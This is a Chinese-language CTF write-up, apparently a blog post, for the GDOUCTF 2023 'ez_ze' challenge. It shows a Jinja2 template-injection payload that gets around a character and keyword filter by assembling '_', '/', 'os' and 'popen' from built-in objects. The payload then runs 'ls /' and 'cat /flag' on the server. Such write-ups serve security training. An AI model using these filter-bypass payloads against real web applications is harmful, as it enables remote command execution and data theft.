[GDOUCTF 2023]<ez_ze>!

这题是一个jinja2的ssti模板注入,经过测试过滤了
_ {{}} . [] '' os popen getitem
输入{% print(lipsum|string|list) %}或者{% print(config|string|list) %}


从这里面获取我们需要的字符
获取下划线和空格

{% set pop=dict(pop=1)|join %}
{% set xia=(lipsum|string|list)|attr(pop)(18) %}        //下划线
{% set kong=(lipsum|string|list)|attr(pop)(9) %}        //空格

获取斜杆

{% set pop=dict(pop=1)|join %}
{% set xie=(config|string|list)|attr(pop)(239) %}

然后就是构造 globals
{% set globals=(xia,xia,dict(globals=a)|jion,xia,xia)|jion %}
构造 getitem
{% set geti=(xia,xia,dict(get=a,item=b)|jion,xia,xia)|jion %}
执行

{% set pop=dict(pop=1)|join %}													
{% set kong=(lipsum|string|list)|attr(pop)(9) %}								 
{% set xia=(lipsum|string|list)|attr(pop)(18) %}								 
{% set xie=(config|string|list)|attr(pop)(239) %}								 
{% set globals=(xia,xia,dict(globals=a)|join,xia,xia)|join %}					 
{% set geti=(xia,xia,dict(get=a,item=b)|join,xia,xia)|join %}					 
{% set o=dict(o=a,s=b)|join %}													 
{% set po=dict(pop=a,en=b)|join %}												 
{% set cmd=(dict(ls=a)|join,kong,xie|join)|join %}								 
{% set read=dict(read=a)|join %}												 
{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}

解释

{% set pop=dict(pop=1)|join %}													
{% set kong=(lipsum|string|list)|attr(pop)(9) %}								kong=空格
{% set xia=(lipsum|string|list)|attr(pop)(18) %}								xia=_
{% set xie=(config|string|list)|attr(pop)(239) %}								xie=/
{% set globals=(xia,xia,dict(globals=a)|join,xia,xia)|join %}					globals=__globals__
{% set geti=(xia,xia,dict(get=a,item=b)|join,xia,xia)|join %}					geti=__getitem__
{% set o=dict(o=a,s=b)|join %}													o=os
{% set po=dict(pop=a,en=b)|join %}												po=popen
{% set cmd=(dict(ls=a)|join,kong,xie|join)|join %}								cmd=ls /
{% set read=dict(read=a)|join %}												read=read
{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}


最后修改一下命令就可以了
最后的payload:

{% set pop=dict(pop=1)|join %}													
{% set kong=(lipsum|string|list)|attr(pop)(9) %}								 
{% set xia=(lipsum|string|list)|attr(pop)(18) %}								 
{% set xie=(config|string|list)|attr(pop)(239) %}								 
{% set globals=(xia,xia,dict(globals=a)|join,xia,xia)|join %}					 
{% set geti=(xia,xia,dict(get=a,item=b)|join,xia,xia)|join %}					 
{% set o=dict(o=a,s=b)|join %}													 
{% set po=dict(pop=a,en=b)|join %}												 
{% set cmd=(dict(cat=a)|join,kong,xie,dict(flag=b)|join)|join %}								 
{% set read=dict(read=a)|join %}												 
{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}
posted @ 2024-09-12 22:27  lcmz  阅读(63)  评论(0)    收藏  举报